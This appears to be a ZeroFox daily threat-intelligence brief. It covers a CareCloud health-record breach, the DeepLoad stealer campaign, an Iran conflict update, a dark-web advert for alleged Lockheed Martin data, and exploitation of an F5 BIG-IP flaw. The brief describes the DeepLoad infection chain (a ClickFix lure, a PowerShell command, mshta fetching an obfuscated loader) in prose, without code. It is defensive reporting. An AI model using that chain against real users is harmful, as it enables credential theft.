ZeroFox Daily Intelligence Brief - March 31, 2026

ZeroFox Daily Intelligence Brief - March 31, 2026

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• Healthcare Tech Provider CareCloud Discloses Data Breach
• DeepLoad Exploits User Interaction to Deploy Stealer Malware
• Iran SITREP: Kuwait Oil Tanker Fire, Chinese Containers Cross Strait of Hormuz

Healthcare Tech Provider CareCloud Discloses Data Breach

Source: https://www.bleepingcomputer.com/news/security/healthcare-tech-firm-carecloud-says-hackers-stole-patient-data/

What we know: U.S.-based healthcare software company CareCloud has disclosed a data breach affecting its electronic health record environment, which also caused an eight-hour network disruption on March 16, 2026.

Context: The company has since fully restored all functionality and data access in the impacted environment. The affected environment held patient health records for CareCloud customers. CareCloud is a software associate to hospitals and medical practices, serving over 45,000 providers.

Analyst note: Personally identifiable information (PII) and protected health information (PHI) records from across the United States are very likely to be exposed in this incident. Threat actors are likely to extort CareCloud and/or its customers. Furthermore, exposed individuals are likely to be targeted in insurance fraud, blackmail, phishing, and social engineering attacks.

DeepLoad Exploits User Interaction to Deploy Stealer Malware

Source: https://thehackernews.com/2026/03/deepload-malware-uses-clickfix-and-wmi.html

What we know: A new malware strain called “DeepLoad” uses social engineering tactic ClickFix to infect victim systems and steal credentials through a stealer and malicious browser extension. The attack begins with a ClickFix lure that tricks users into executing a PowerShell command, which then uses legitimate tool mshta[.]exe to download and run an obfuscated loader.

Context: DeepLoad steals credentials by extracting saved browser passwords and deploying a persistent malicious extension that captures login details in real time. In February 2026, threat actor “MysteryHack” advertised DeepLoad, on dark web forum Exploit, as a malware suite that replaces legitimate cryptocurrency wallet applications with malicious versions to steal funds from victims.

Analyst note: It is likely that DeepLoad’s ability to carry out real-time credential harvesting via browser extensions and stealers will see greater adoption by threat actors of different capabilities to drive higher volumes of account takeovers and to target cryptocurrency holders and executives.

Iran SITREP: Kuwait Oil Tanker Fire, Chinese Containers Cross Strait of Hormuz

• Kuwait said that an oil tanker was targeted in an Iranian attack while anchored at Dubai port in the United Arab Emirates. The attack sparked fire on board, raising possible oil spill concerns. No casualties have been reported.
• The video of an explosion shared by Trump early on March 31, 2026, is reportedly a major strike carried out outside the Iranian city of Isfahan. Isfahan is home to an uranium enrichment site. Iran has not acknowledged the attack yet.
• Two Indonesian United Nations peacekeepers have been killed while on escort duty in southern Lebanon amid intensifying hostilities between Israel and Iran-backed Hezbollah. Two soldiers have been injured.
• Two Chinese container ships have reportedly successfully passed through the SoH on their second attempt after turning back the first time. Additionally, a tanker carrying crude oil bound for India also navigated the strait successfully to exit the Gulf.

DEEP AND DARK WEB INTELLIGENCE

Threat Market user APT IRAN: On March 30, 2026, ZeroFox observed that a threat actor named "APT IRAN" advertised a 375 TB dataset allegedly belonging to Lockheed Martin, an American defense and aerospace manufacturer, on a Russian-language deep and dark web forum Threat Market. APT Iran is seeking USD 598.5 million for the complete dataset, with additional offers ranging from USD 500,000 to USD 1 million for samples. The forum is likely relatively new, as ZeroFox has observed limited user activity and content. The advertisement is very likely to be part of psychological operations against the American military-industrial complex, as no samples have been provided and any attempt to obtain one is effectively deterred by an exorbitant price tag.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2025-53521: F5 Networks has reclassified this vulnerability in its BIG-IP Access Policy Manager from a denial-of-service flaw to a remote code execution (RCE) issue after confirming active exploitation. Attackers are exploiting the flaw to deploy webshells on unpatched systems. CISA has also added this vulnerability to its KEV catalogue. BIG-IP Access Policy Manager is a centralized access management solution that allows administrators to secure and control user access to networks, cloud services, applications, and APIs. Sustained exploitation of this vulnerability is likely to enable threat actors to access F5 Networks’s clients’ networks and accounts.

Affected products: F5 BIG-IP Access Policy Manager